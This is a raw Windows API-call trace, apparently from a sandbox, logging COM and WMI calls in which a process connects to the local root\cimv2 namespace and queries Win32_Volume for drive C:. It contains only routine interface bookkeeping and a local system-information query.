	[0242.197] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x5dee5a4 | out: lpiid=0x5dee5a4) returned 0x0
	[0242.197] CoGetClassObject (in: rclsid=0x7b796c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee50c | out: ppv=0x5dee50c*=0x6350ad0) returned 0x0
	[0242.367] WbemLocator:IUnknown:QueryInterface (in: This=0x6350ad0, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee33c | out: ppvObject=0x5dee33c*=0x0) returned 0x80004002
	[0242.367] WbemLocator:IClassFactory:CreateInstance (in: This=0x6350ad0, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x6350bf0) returned 0x0
	[0242.367] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee118 | out: ppvObject=0x5dee118*=0x6350bf0) returned 0x0
	[0242.367] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dee0d4 | out: ppvObject=0x5dee0d4*=0x0) returned 0x80004002
	[0242.368] WbemLocator:IUnknown:AddRef (This=0x6350bf0) returned 0x3
	[0242.368] CoGetContextToken (in: pToken=0x5dedf60 | out: pToken=0x5dedf60) returned 0x0
	[0242.368] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedf48 | out: ppvObject=0x5dedf48*=0x0) returned 0x80004002
	[0242.368] CoGetContextToken (in: pToken=0x5dedf58 | out: pToken=0x5dedf58) returned 0x0
	[0242.368] WbemLocator:IUnknown:AddRef (This=0x6350bf0) returned 0x4
	[0242.368] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedfcc | out: ppvObject=0x5dedfcc*=0x0) returned 0x80004002
	[0242.368] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x3
	[0242.368] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x2
	[0242.368] WbemLocator:IUnknown:Release (This=0x6350ad0) returned 0x0
	[0242.369] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x1
	[0242.369] CoGetContextToken (in: pToken=0x5dee464 | out: pToken=0x5dee464) returned 0x0
	[0242.369] CoGetContextToken (in: pToken=0x5dee424 | out: pToken=0x5dee424) returned 0x0
	[0242.369] WbemLocator:IUnknown:AddRef (This=0x6350bf0) returned 0x2
	[0242.369] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x5dee4a0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dee49c | out: ppvObject=0x5dee49c*=0x6350bf0) returned 0x0
	[0242.369] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x2
	[0242.369] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x1
	[0242.370] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee694 | out: puCount=0x5dee694*=0x2) returned 0x0
	[0242.370] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=8, puBuffLength=0x5dee690*=0x0, pszText=0x0 | out: puBuffLength=0x5dee690*=0x17, pszText=0x0) returned 0x0
	[0242.371] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=8, puBuffLength=0x5dee690*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee690*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.371] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5dee16c | out: ppv=0x5dee16c*=0x6350c00) returned 0x0
	[0242.371] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6350c00, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5dee1b8 | out: ppNamespace=0x5dee1b8*=0x635d3c4) returned 0x0
	[0244.507] WbemLocator:IUnknown:QueryInterface (in: This=0x635d3c4, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee088 | out: ppvObject=0x5dee088*=0x7f8c5c) returned 0x0
	[0244.507] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7f8c5c, pProxy=0x635d3c4, pAuthnSvc=0x5dee0d0, pAuthzSvc=0x5dee0cc, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4, pImpLevel=0x5dee0c0, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8 | out: pAuthnSvc=0x5dee0d0*=0xa, pAuthzSvc=0x5dee0cc*=0x0, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4*=0x6, pImpLevel=0x5dee0c0*=0x2, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8*=0x1) returned 0x0
	[0244.507] WbemLocator:IUnknown:Release (This=0x7f8c5c) returned 0x1
	[0244.507] WbemLocator:IUnknown:QueryInterface (in: This=0x635d3c4, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee07c | out: ppvObject=0x5dee07c*=0x7f8c7c) returned 0x0
	[0244.507] WbemLocator:IUnknown:QueryInterface (in: This=0x635d3c4, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee078 | out: ppvObject=0x5dee078*=0x7f8c5c) returned 0x0
	[0244.507] WbemLocator:IClientSecurity:SetBlanket (This=0x7f8c5c, pProxy=0x635d3c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.508] WbemLocator:IUnknown:Release (This=0x7f8c5c) returned 0x2
	[0244.508] WbemLocator:IUnknown:Release (This=0x7f8c7c) returned 0x1
	[0244.508] CoTaskMemFree (pv=0x7f83d8) 
	[0244.508] WbemLocator:IUnknown:Release (This=0x6350c00) returned 0x0
	[0244.508] WbemLocator:IUnknown:QueryInterface (in: This=0x635d3c4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5deda38 | out: ppvObject=0x5deda38*=0x7f8c7c) returned 0x0
	[0244.508] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8c7c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5ded9f4 | out: ppvObject=0x5ded9f4*=0x0) returned 0x80004002
	[0244.509] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8c7c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x0) returned 0x80004002
	[0244.544] WbemLocator:IUnknown:AddRef (This=0x7f8c7c) returned 0x3
	[0244.544] CoGetContextToken (in: pToken=0x5ded880 | out: pToken=0x5ded880) returned 0x0
	[0244.544] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8c7c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded868 | out: ppvObject=0x5ded868*=0x7f8bdc) returned 0x0
	[0244.544] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f8bdc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded870 | out: pCid=0x5ded870*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.544] WbemLocator:IUnknown:Release (This=0x7f8bdc) returned 0x3
	[0244.545] CoGetContextToken (in: pToken=0x5ded878 | out: pToken=0x5ded878) returned 0x0
	[0244.545] WbemLocator:IUnknown:AddRef (This=0x7f8c7c) returned 0x4
	[0244.545] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8c7c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8ec | out: ppvObject=0x5ded8ec*=0x7f8c64) returned 0x0
	[0244.545] WbemLocator:IUnknown:Release (This=0x7f8c7c) returned 0x4
	[0244.545] WbemLocator:IRpcOptions:Query (in: This=0x7f8c64, pPrx=0x7f8c7c, dwProperty=2, pdwValue=0x5ded910 | out: pdwValue=0x5ded910) returned 0x80004002
	[0244.545] WbemLocator:IUnknown:Release (This=0x7f8c64) returned 0x3
	[0244.545] WbemLocator:IUnknown:Release (This=0x7f8c7c) returned 0x2
	[0244.545] CoGetContextToken (in: pToken=0x5dedcec | out: pToken=0x5dedcec) returned 0x0
	[0244.546] CoGetContextToken (in: pToken=0x5dedcac | out: pToken=0x5dedcac) returned 0x0
	[0244.546] WbemLocator:IUnknown:AddRef (This=0x7f8c7c) returned 0x3
	[0244.546] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8c7c, riid=0x5dedd28*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dedd24 | out: ppvObject=0x5dedd24*=0x635d3c4) returned 0x0
	[0244.546] WbemLocator:IUnknown:Release (This=0x7f8c7c) returned 0x3
	[0244.546] WbemLocator:IUnknown:Release (This=0x635d3c4) returned 0x2
	[0244.546] WbemLocator:IUnknown:Release (This=0x635d3c4) returned 0x1
	[0244.547] CoGetContextToken (in: pToken=0x5dee608 | out: pToken=0x5dee608) returned 0x0
	[0244.547] WbemLocator:IUnknown:AddRef (This=0x7f8c7c) returned 0x2
	[0244.547] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8c7c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee22c | out: ppvObject=0x5dee22c*=0x7f8c7c) returned 0x0
	[0244.547] WbemLocator:IUnknown:Release (This=0x7f8c7c) returned 0x2
	[0244.548] WbemLocator:IUnknown:Release (This=0x7f8c7c) returned 0x1
	[0244.548] CoGetContextToken (in: pToken=0x5dede0c | out: pToken=0x5dede0c) returned 0x0
	[0244.548] CoGetContextToken (in: pToken=0x5deddcc | out: pToken=0x5deddcc) returned 0x0
	[0244.548] WbemLocator:IUnknown:AddRef (This=0x7f8c7c) returned 0x2
	[0244.548] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8c7c, riid=0x5dede48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dede44 | out: ppvObject=0x5dede44*=0x635d3c4) returned 0x0
	[0244.548] WbemLocator:IUnknown:Release (This=0x7f8c7c) returned 0x2
	[0244.548] WbemLocator:IUnknown:AddRef (This=0x635d3c4) returned 0x3
	[0244.548] IWbemServices:ExecQuery (in: This=0x635d3c4, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x5dee450 | out: ppEnum=0x5dee450*=0x635cb34) returned 0x0
	[0244.558] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0fc | out: ppvObject=0x5dee0fc*=0x635cb38) returned 0x0
	[0244.558] IClientSecurity:QueryBlanket (in: This=0x635cb38, pProxy=0x635cb34, pAuthnSvc=0x5dee144, pAuthzSvc=0x5dee140, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148, pImpLevel=0x5dee134, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c | out: pAuthnSvc=0x5dee144*=0xa, pAuthzSvc=0x5dee140*=0x0, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148*=0x6, pImpLevel=0x5dee134*=0x2, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c*=0x1) returned 0x0
	[0244.559] IUnknown:Release (This=0x635cb38) returned 0x1
	[0244.559] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0f0 | out: ppvObject=0x5dee0f0*=0x7f8d6c) returned 0x0
	[0244.559] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0ec | out: ppvObject=0x5dee0ec*=0x635cb38) returned 0x0
	[0244.559] IClientSecurity:SetBlanket (This=0x635cb38, pProxy=0x635cb34, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.570] IUnknown:Release (This=0x635cb38) returned 0x2
	[0244.570] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x1
	[0244.570] CoTaskMemFree (pv=0x7f8408) 
	[0244.570] WbemLocator:IUnknown:Release (This=0x635d3c4) returned 0x2
	[0244.570] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedaa8 | out: ppvObject=0x5dedaa8*=0x7f8d6c) returned 0x0
	[0244.570] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda64 | out: ppvObject=0x5deda64*=0x0) returned 0x80004002
	[0244.572] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded958 | out: ppvObject=0x5ded958*=0x0) returned 0x80004002
	[0244.577] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x3
	[0244.577] CoGetContextToken (in: pToken=0x5ded8f0 | out: pToken=0x5ded8f0) returned 0x0
	[0244.577] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8d8 | out: ppvObject=0x5ded8d8*=0x7f8ccc) returned 0x0
	[0244.578] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f8ccc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8e0 | out: pCid=0x5ded8e0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.578] WbemLocator:IUnknown:Release (This=0x7f8ccc) returned 0x3
	[0244.578] CoGetContextToken (in: pToken=0x5ded8e8 | out: pToken=0x5ded8e8) returned 0x0
	[0244.578] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x4
	[0244.578] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded95c | out: ppvObject=0x5ded95c*=0x7f8d54) returned 0x0
	[0244.578] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x4
	[0244.578] WbemLocator:IRpcOptions:Query (in: This=0x7f8d54, pPrx=0x7f8d6c, dwProperty=2, pdwValue=0x5ded980 | out: pdwValue=0x5ded980) returned 0x80004002
	[0244.578] WbemLocator:IUnknown:Release (This=0x7f8d54) returned 0x3
	[0244.578] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x2
	[0244.578] CoGetContextToken (in: pToken=0x5dedd5c | out: pToken=0x5dedd5c) returned 0x0
	[0244.578] CoGetContextToken (in: pToken=0x5dedd1c | out: pToken=0x5dedd1c) returned 0x0
	[0244.579] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x3
	[0244.579] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x5dedd98*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedd94 | out: ppvObject=0x5dedd94*=0x635cb34) returned 0x0
	[0244.579] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x3
	[0244.579] IUnknown:Release (This=0x635cb34) returned 0x2
	[0244.579] IUnknown:Release (This=0x635cb34) returned 0x1
	[0244.579] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee6e8 | out: puCount=0x5dee6e8*=0x2) returned 0x0
	[0244.579] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee6e4*=0x0, pszText=0x0 | out: puBuffLength=0x5dee6e4*=0x17, pszText=0x0) returned 0x0
	[0244.579] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee6e4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee6e4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0244.579] CoGetContextToken (in: pToken=0x5dee084 | out: pToken=0x5dee084) returned 0x0
	[0244.579] CoGetContextToken (in: pToken=0x5dee044 | out: pToken=0x5dee044) returned 0x0
	[0244.579] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x2
	[0244.579] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x5dee0c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee0bc | out: ppvObject=0x5dee0bc*=0x635cb34) returned 0x0
	[0244.580] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x2
	[0244.580] IUnknown:AddRef (This=0x635cb34) returned 0x3
	[0244.580] IEnumWbemClassObject:Clone (in: This=0x635cb34, ppEnum=0x5dee6b8 | out: ppEnum=0x5dee6b8*=0x635d464) returned 0x0
	[0244.587] IUnknown:QueryInterface (in: This=0x635d464, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x635d468) returned 0x0
	[0244.587] IClientSecurity:QueryBlanket (in: This=0x635d468, pProxy=0x635d464, pAuthnSvc=0x5dee3bc, pAuthzSvc=0x5dee3b8, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0, pImpLevel=0x5dee3ac, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4 | out: pAuthnSvc=0x5dee3bc*=0xa, pAuthzSvc=0x5dee3b8*=0x0, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0*=0x6, pImpLevel=0x5dee3ac*=0x2, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4*=0x1) returned 0x0
	[0244.587] IUnknown:Release (This=0x635d468) returned 0x1
	[0244.587] IUnknown:QueryInterface (in: This=0x635d464, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee368 | out: ppvObject=0x5dee368*=0x7f8f4c) returned 0x0
	[0244.587] IUnknown:QueryInterface (in: This=0x635d464, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee364 | out: ppvObject=0x5dee364*=0x635d468) returned 0x0
	[0244.587] IClientSecurity:SetBlanket (This=0x635d468, pProxy=0x635d464, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.602] IUnknown:Release (This=0x635d468) returned 0x2
	[0244.602] WbemLocator:IUnknown:Release (This=0x7f8f4c) returned 0x1
	[0244.602] CoTaskMemFree (pv=0x7f83a8) 
	[0244.602] IUnknown:Release (This=0x635cb34) returned 0x2
	[0244.602] IUnknown:QueryInterface (in: This=0x635d464, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedd10 | out: ppvObject=0x5dedd10*=0x7f8f4c) returned 0x0
	[0244.603] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8f4c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dedccc | out: ppvObject=0x5dedccc*=0x0) returned 0x80004002
	[0244.614] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8f4c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dedbc0 | out: ppvObject=0x5dedbc0*=0x0) returned 0x80004002
	[0244.625] WbemLocator:IUnknown:AddRef (This=0x7f8f4c) returned 0x3
	[0244.625] CoGetContextToken (in: pToken=0x5dedb58 | out: pToken=0x5dedb58) returned 0x0
	[0244.625] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8f4c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedb40 | out: ppvObject=0x5dedb40*=0x7f8eac) returned 0x0
	[0244.625] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f8eac, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedb48 | out: pCid=0x5dedb48*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.625] WbemLocator:IUnknown:Release (This=0x7f8eac) returned 0x3
	[0244.625] CoGetContextToken (in: pToken=0x5dedb50 | out: pToken=0x5dedb50) returned 0x0
	[0244.625] WbemLocator:IUnknown:AddRef (This=0x7f8f4c) returned 0x4
	[0244.626] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8f4c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedbc4 | out: ppvObject=0x5dedbc4*=0x7f8f34) returned 0x0
	[0244.626] WbemLocator:IUnknown:Release (This=0x7f8f4c) returned 0x4
	[0244.626] WbemLocator:IRpcOptions:Query (in: This=0x7f8f34, pPrx=0x7f8f4c, dwProperty=2, pdwValue=0x5dedbe8 | out: pdwValue=0x5dedbe8) returned 0x80004002
	[0244.626] WbemLocator:IUnknown:Release (This=0x7f8f34) returned 0x3
	[0244.626] WbemLocator:IUnknown:Release (This=0x7f8f4c) returned 0x2
	[0244.626] CoGetContextToken (in: pToken=0x5dedfc4 | out: pToken=0x5dedfc4) returned 0x0
	[0244.626] CoGetContextToken (in: pToken=0x5dedf84 | out: pToken=0x5dedf84) returned 0x0
	[0244.626] WbemLocator:IUnknown:AddRef (This=0x7f8f4c) returned 0x3
	[0244.626] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8f4c, riid=0x5dee000*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedffc | out: ppvObject=0x5dedffc*=0x635d464) returned 0x0
	[0244.626] WbemLocator:IUnknown:Release (This=0x7f8f4c) returned 0x3
